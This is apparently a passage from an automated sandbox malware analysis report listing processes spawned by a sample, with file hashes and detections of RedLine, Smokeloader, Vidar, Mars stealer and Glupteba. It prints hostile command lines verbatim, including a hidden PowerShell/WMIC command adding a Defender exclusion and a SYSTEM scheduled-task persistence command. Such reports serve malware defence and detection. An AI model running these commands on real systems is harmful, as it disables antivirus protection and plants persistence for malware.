File size: 3'428'696 bytes
MD5 hash: B9882FE8BB7AB2A4D094F9FF5442DF1C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 21:37:07
Start date: 23/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff68cce0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 21:37:08
Start date: 23/04/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase: 0x540000
File size: 43'008 bytes
MD5 hash: 9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 4
Start time: 21:37:10
Start date: 23/04/2024
Path: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe"
Imagebase: 0x400000
File size: 473'089 bytes
MD5 hash: CCEE6D525CB5940F123C86DB6EDD40DA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2259248364.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000003.1624901520.0000000006A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID:5
Start time:21:37:12
Start date:23/04/2024
Path:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe"
Imagebase:0x140000000
File size:4'407'808 bytes
MD5 hash:3953BBAD77CDCB9D5AF2694EED7E6688
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:6
Start time:21:37:13
Start date:23/04/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Imagebase:0x7ff68dea0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:21:37:13
Start date:23/04/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
Imagebase:0x7ff68dea0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:21:37:13
Start date:23/04/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
Imagebase:0x7ff68dea0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:9
Start time:21:37:14
Start date:23/04/2024
Path:C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe"
Imagebase:0x400000
File size:6'711'576 bytes
MD5 hash:AAA56797070369AD346FBD9BB6CC5E8B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:10
Start time:21:37:15
Start date:23/04/2024
Path:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\u5v8.0.exe"
Imagebase:0x400000
File size:325'120 bytes
MD5 hash:BCF475BE78F3965DD066CA8DABBEB31F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1398448952.0000000004200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000A.00000003.1398448952.0000000004200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:11
Start time:21:37:15
Start date:23/04/2024
Path:C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe"
Imagebase:0x400000
File size:473'089 bytes
MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.2255300318.000000000411C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000B.00000003.1635257524.0000000006A1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:low
Has exited:true

Target ID:13
Start time:21:37:16
Start date:23/04/2024
Path:C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe
Wow64 process (32bit):true
Commandline:.\Install.exe /nxdidQZJ "385118" /S
Imagebase:0xd30000
File size:7'157'248 bytes
MD5 hash:E77964E011D8880EAE95422769249CA4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                Start time:21:37:18
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                Imagebase:0x40000
                                                                                                                                                                                                                                File size:41'472 bytes
                                                                                                                                                                                                                                MD5 hash:D95C443851F70F77427B3183B1619DD3
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                Start time:21:37:18
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                Start time:21:37:18
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                Imagebase:0xc30000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                Start time:21:37:18
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                Imagebase:0x540000
                                                                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:21:37:19
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                Imagebase:0x200000
                                                                                                                                                                                                                                File size:427'008 bytes
                                                                                                                                                                                                                                MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:21:37:20
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:473'089 bytes
                                                                                                                                                                                                                                MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000013.00000002.1917490394.000000000418C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000013.00000003.1674965384.0000000006B5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:21:37:20
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\u69w.0.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\u69w.0.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:325'120 bytes
                                                                                                                                                                                                                                MD5 hash:BCF475BE78F3965DD066CA8DABBEB31F
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000014.00000003.1454159777.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000014.00000003.1454159777.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                Start time:21:37:22
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:473'089 bytes
                                                                                                                                                                                                                                MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000015.00000002.1918521862.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000003.1847945255.0000000006A38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000015.00000002.1930196904.000000000434C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:22
Start time:21:37:24
Start date:23/04/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat" "
Imagebase:0x7ff7ed720000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:21:37:25
Start date:23/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff68cce0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:21:37:25
Start date:23/04/2024
Path:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe"
Imagebase:0x400000
File size:8'538'160 bytes
MD5 hash:54D53F5BDB925B3ED005A84B5492447F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Has exited:true

Target ID:26
Start time:21:37:25
Start date:23/04/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F
Imagebase:0x3a0000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:21:37:25
Start date:23/04/2024
Path:C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe"
Imagebase:0x400000
File size:473'089 bytes
MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001B.00000002.1937757105.000000000408C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001B.00000002.1940278884.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:28
Start time:21:37:25
Start date:23/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff68cce0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:21:37:25
Start date:23/04/2024
Path:C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe"
Imagebase:0x400000
File size:473'089 bytes
MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001D.00000002.1939799886.000000000439C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001D.00000002.1938329589.0000000004300000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:30
Start time:21:37:27
Start date:23/04/2024
Path:C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe"
Imagebase:0x140000000
File size:4'407'808 bytes
MD5 hash:3953BBAD77CDCB9D5AF2694EED7E6688
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:21:37:28
Start date:23/04/2024
Path:C:\Users\user\AppData\Local\Temp\u4dc.0.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\u4dc.0.exe"
Imagebase:0x400000
File size:325'120 bytes
MD5 hash:BCF475BE78F3965DD066CA8DABBEB31F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                Start time:21:37:29
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'405'128 bytes
                                                                                                                                                                                                                                MD5 hash:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000020.00000001.1883456337.0000000000843000.00000040.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                Start time:21:37:29
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'405'128 bytes
                                                                                                                                                                                                                                MD5 hash:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000021.00000001.1945506899.0000000000843000.00000040.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                Start time:21:37:29
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:473'089 bytes
                                                                                                                                                                                                                                MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000022.00000002.2122134547.00000000043D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000003.2095182963.0000000006A3F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000022.00000002.2121373428.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                Start time:21:37:29
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\u69w.1.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\u69w.1.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'866'096 bytes
                                                                                                                                                                                                                                MD5 hash:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000023.00000000.1537903237.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u69w.1.exe, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                Start time:21:37:30
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'405'128 bytes
                                                                                                                                                                                                                                MD5 hash:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                                Start time:21:37:31
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe em /VNsite_idnLd 385118 /S
                                                                                                                                                                                                                                Imagebase:0x280000
                                                                                                                                                                                                                                File size:7'157'248 bytes
                                                                                                                                                                                                                                MD5 hash:E77964E011D8880EAE95422769249CA4
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                                                Start time:21:37:31
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'405'128 bytes
                                                                                                                                                                                                                                MD5 hash:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000026.00000001.2017532049.0000000000843000.00000040.00000001.01000000.0000001D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                Start time:21:37:31
Start date:23/04/2024
Path:C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe"
Imagebase:0x400000
File size:473'089 bytes
MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000027.00000002.2175970589.000000000418C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000027.00000003.2086147863.0000000006A37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000027.00000002.2184889083.0000000004440000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:40
Start time:21:37:31
Start date:23/04/2024
Path:C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe"
Imagebase:0x7ff68dea0000
File size:4'407'808 bytes
MD5 hash:3953BBAD77CDCB9D5AF2694EED7E6688
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:21:37:31
